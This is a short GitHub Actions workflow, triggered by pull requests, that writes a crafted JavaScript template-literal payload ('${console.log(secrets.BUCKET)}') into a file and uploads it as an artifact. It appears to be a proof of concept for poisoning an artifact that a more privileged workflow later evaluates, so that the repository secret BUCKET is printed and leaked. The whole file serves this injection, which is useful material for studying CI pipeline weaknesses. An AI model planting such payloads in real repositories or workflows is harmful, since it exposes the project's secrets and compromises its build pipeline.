name: check-label-preview-env

on:
  pull_request:

jobs:
  check-label-preview-env:
    runs-on: ubuntu-latest
    steps:
    - name: Set PR
      run: echo '`${console.log(secrets.BUCKET)}`' > pr.txt
    - name: Save PR
      uses: actions/upload-artifact@v2
      with:
        name: pr.txt
        path: |
          pr.txt
